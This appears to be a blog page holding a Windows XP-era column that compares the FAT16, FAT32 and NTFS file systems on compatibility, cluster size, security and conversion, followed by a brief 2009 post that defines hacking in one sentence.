The FAT16 file system was introduced way back with MS-DOS in 1981, and it's showing its age. It was designed originally to handle files on a floppy drive, and has had minor modifications over the years so it can handle hard disks, and even file names longer than the original limitation of 8.3 characters, but it's still the lowest common denominator. The biggest advantage of FAT16 is that it is compatible across a wide variety of operating systems, including Windows 95/98/Me, OS/2, Linux, and some versions of UNIX.

The biggest problem of FAT16 is that it has a fixed maximum number of clusters per partition, so as hard disks get bigger and bigger, the size of each cluster has to get larger. In a 2-GB partition, each cluster is 32 kilobytes, meaning that even the smallest file on the partition will take up 32 KB of space. FAT16 also doesn't support compression, encryption, or advanced security using access control lists.
FAT32
The FAT32 file system, originally introduced in Windows 95 Service Pack 2, is really just an extension of the original FAT16 file system that provides for a much larger number of clusters per partition. As such, it greatly improves the overall disk utilization when compared to a FAT16 file system. However, FAT32 shares all of the other limitations of FAT16, and adds an important additional limitation: many operating systems that can recognize FAT16 will not work with FAT32, most notably Windows NT, but also Linux and UNIX as well. Now this isn't a problem if you're running FAT32 on a Windows XP computer and sharing your drive out to other computers on your network; they don't need to know (and generally don't really care) what your underlying file system is.
The Advantages of NTFS
The NTFS file system, introduced with the first version of Windows NT, is a completely different file system from FAT. It provides for greatly increased security, file-by-file compression, quotas, and even encryption. It is the default file system for new installations of Windows XP, and if you're doing an upgrade from a previous version of Windows, you'll be asked if you want to convert your existing file systems to NTFS. Don't worry. If you've already upgraded to Windows XP and didn't do the conversion then, it's not a problem. You can convert FAT16 or FAT32 volumes to NTFS at any point. Just remember that you can't easily go back to FAT or FAT32 (without reformatting the drive or partition), not that I think you'll want to. The NTFS file system is generally not compatible with other operating systems installed on the same computer, nor is it available when you've booted a computer from a floppy disk. For this reason, many system administrators, myself included, used to recommend that users format at least a small partition at the beginning of their main hard disk as FAT. This partition provided a place to store emergency recovery tools or special drivers needed for reinstallation, and was a mechanism for digging yourself out of the hole you'd just dug into. But with the enhanced recovery abilities built into Windows XP (more on that in a future column), I don't think it's necessary or desirable to create that initial FAT partition.
When to Use FAT or FAT32
If you're running more than one operating system on a single computer, you will definitely need to format some of your volumes as FAT. Any programs or data that need to be accessed by more than one operating system on that computer should be stored on a FAT16 or possibly FAT32 volume. But keep in mind that you have no security for data on a FAT16 or FAT32 volume: anyone with access to the computer can read, change, or even delete any file that is stored on a FAT16 or FAT32 partition. In many cases, this is even possible over a network. So do not store sensitive files on drives or partitions formatted with FAT file systems.

Wednesday, July 22, 2009

WHAT IS A HACK

What is hacking?
Hacking is an act of penetrating computer systems to gain knowledge about the system and how it works.
